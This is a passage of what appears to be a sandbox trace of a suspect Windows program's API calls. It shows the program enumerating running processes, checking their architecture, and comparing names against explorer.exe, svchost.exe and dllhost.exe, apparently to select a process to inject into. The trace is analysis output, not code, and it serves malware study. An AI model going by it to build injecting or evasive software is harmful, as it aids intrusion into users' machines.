cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0258.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0258.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0258.778] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0258.778] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0258.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0258.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0258.780] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0258.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0258.780] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0258.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0258.781] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0258.782] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0258.782] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0258.783] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0258.783] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0258.784] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0258.784] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0258.785] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0258.785] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0258.786] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.786] CloseHandle (hObject=0xd8) returned 1 [0258.786] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0258.786] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0258.786] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0258.786] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0258.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0258.786] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0258.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0258.787] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.787] CloseHandle (hObject=0xd8) returned 1 [0258.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0258.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0258.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0258.787] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0258.788] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0258.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0258.788] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0258.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0258.788] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.789] CloseHandle (hObject=0xd8) returned 1 [0258.789] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0258.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0258.789] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.789] CloseHandle (hObject=0xd8) returned 1 [0258.789] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0258.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0258.790] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.790] CloseHandle (hObject=0xd8) returned 1 [0258.790] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0258.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0258.790] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.790] CloseHandle (hObject=0xd8) returned 1 [0258.790] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0258.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0258.791] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.791] CloseHandle (hObject=0xd8) returned 1 [0258.791] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0258.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0258.791] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.791] CloseHandle (hObject=0xd8) returned 1 [0258.792] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0258.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0258.792] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.792] CloseHandle (hObject=0xd8) returned 1 [0258.792] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0258.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0258.793] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.793] CloseHandle (hObject=0xd8) returned 1 [0258.793] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0258.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0258.793] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.793] CloseHandle (hObject=0xd8) returned 1 [0258.793] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0258.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0258.794] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.794] CloseHandle (hObject=0xd8) returned 1 [0258.794] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0258.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0258.794] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.794] CloseHandle (hObject=0xd8) returned 1 [0258.794] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0258.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0258.795] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.795] CloseHandle (hObject=0xd8) returned 1 [0258.795] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0258.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0258.795] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.796] CloseHandle (hObject=0xd8) returned 1 [0258.796] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0258.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0258.796] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.796] CloseHandle (hObject=0xd8) returned 1 [0258.796] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0258.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0258.797] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.797] CloseHandle (hObject=0xd8) returned 1 [0258.797] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0258.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0258.797] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.797] CloseHandle (hObject=0xd8) returned 1 [0258.797] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0258.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0258.798] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.798] CloseHandle (hObject=0xd8) returned 1 [0258.798] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0258.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0258.798] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.799] CloseHandle (hObject=0xd8) returned 1 [0258.799] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0258.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0258.799] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.799] CloseHandle (hObject=0xd8) returned 1 [0258.799] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0258.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0258.800] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.800] CloseHandle (hObject=0xd8) returned 1 [0258.800] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0258.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0258.800] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.801] CloseHandle (hObject=0xd8) returned 1 [0258.801] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0258.801] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0258.802] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0258.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0258.802] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0258.803] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0258.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0258.803] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0258.804] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.804] CloseHandle (hObject=0xd8) returned 1 [0258.804] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0258.804] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0258.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0258.804] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.804] CloseHandle (hObject=0xd8) returned 1 [0258.804] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0258.804] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0258.804] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0258.804] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0258.805] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.805] CloseHandle (hObject=0xd8) returned 1 [0258.805] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0258.805] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.805] CloseHandle (hObject=0xd8) returned 1 [0258.806] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0258.806] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 